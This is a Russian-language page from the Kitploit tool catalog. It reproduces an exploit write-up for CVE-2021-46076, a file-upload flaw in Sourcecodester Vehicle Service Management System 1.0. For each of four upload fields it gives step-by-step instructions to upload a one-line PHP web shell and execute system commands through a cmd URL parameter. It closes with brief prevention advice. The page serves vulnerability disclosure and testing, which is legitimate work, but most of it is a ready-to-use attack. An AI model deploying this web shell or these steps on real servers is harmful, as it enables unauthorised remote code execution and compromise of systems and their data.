Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution — CVE-2021-46076 - Sourcecodester Система управления обслуживанием транспортных средств 1.0 уязвима для загрузки файлов. Злоумышленник может загрузить вредоносный PHP-файл в несколько конечных точек, что приводит к выполнению кода. | Kitploit
Инструменты/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-46076 - Sourcecodester Система управления обслуживанием транспортных средств 1.0 уязвима для загрузки файлов. Злоумышленник может загрузить вредоносный PHP-файл в несколько конечных точек, что приводит к выполнению кода.

Репозиторий
3 месяцев назадЕщё не проверено

CVE-2021-46076

Название эксплойта: Vehicle Service Management System - 'Multiple' Загрузка файла приводит к выполнению кода

Автор эксплойта: SANU P.L

CVE: CVE-2021-46076

CVSS: 8.8 ВЫСОКИЙ

Ссылки:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

Описание:

Sourcecodester Vehicle Service Management System 1.0 уязвим к загрузке файлов. Злоумышленник может загрузить вредоносный php-файл в несколько конечных точек, что приводит к выполнению кода.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел 'My Account' http://localhost/vehicle_service/admin/?page=user

Полезная нагрузка:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Сохраните приведенный выше php-код, например: Cmd.php
  2. В разделе 'My Account' введите все необходимые данные и выберите php-файл в поле 'Avatar'.
  3. Нажмите кнопку обновления.
  4. Откройте загруженное изображение в новой вкладке.
  5. Добавьте параметр cmd в URL и выполните команды.
  6. Финальный URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Выполните все системные команды, например: id, whoami, pwd и т.д.

2. Vehicle Service Management System - 'Список пользователей' (/admin/?page=user/manage_user)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел 'Список пользователей' и нажмите кнопку 'Создать нового'.

Полезная нагрузка:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Сохраните приведенный выше php-код, например: Cmd.php
  2. На странице 'Создать нового пользователя' введите все необходимые данные и выберите php-файл в поле 'Avatar'.
  3. Нажмите кнопку 'Сохранить'.
  4. Откройте загруженное изображение в новой вкладке.
  5. Добавьте параметр cmd в URL и выполните команды.
  6. Финальный URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Выполните все системные команды, например: id, whoami, pwd и т.д.

3. Vehicle Service Management System - 'Настройки - Логотип системы' (/admin/?page=system_info)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел 'Настройки' http://localhost/vehicle_service/admin/?page=system_info

Полезная нагрузка:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Сохраните приведенный выше php-код, например: Cmd.php
  2. В разделе 'Настройки' введите все необходимые данные и выберите php-файл в поле 'Логотип системы'.
  3. Нажмите кнопку обновления.
  4. Откройте изображение логотипа системы в новой вкладке.
  5. Добавьте параметр cmd в URL и выполните команды.
  6. Финальный URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Выполните все системные команды, например: id, whoami, pwd и т.д.

4. Vehicle Service Management System - 'Настройки - Обложка сайта' (/admin/?page=system_info)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел 'Настройки' http://localhost/vehicle_service/admin/?page=system_info

Полезная нагрузка:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Сохраните приведенный выше php-код, например: Cmd.php
  2. В разделе 'Настройки' введите все необходимые данные и выберите php-файл в поле 'Обложка сайта'.
  3. Нажмите кнопку обновления.
  4. Откройте изображение обложки сайта в новой вкладке.
  5. Добавьте параметр cmd в URL и выполните команды.
  6. Финальный URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Выполните все системные команды, например: id, whoami, pwd и т.д.

Воздействие:

Злоумышленник может загрузить вредоносный php-файл в несколько конечных точек, что приводит к выполнению кода.

Рекомендации по предотвращению:

  • Никогда не принимайте имя файла и его расширение напрямую без использования белого списка.
  • Если нет необходимости в символах Unicode, настоятельно рекомендуется принимать только буквенно-цифровые символы и только одну точку в качестве входных данных для имени файла и расширения.
  • Ограничьте размер файла максимальным значением, чтобы предотвратить атаки типа «отказ в обслуживании».
  • Каталог загрузки не должен иметь разрешения на выполнение ('execute').
  • Не полагайтесь только на проверку на стороне клиента.
Скачать инструмент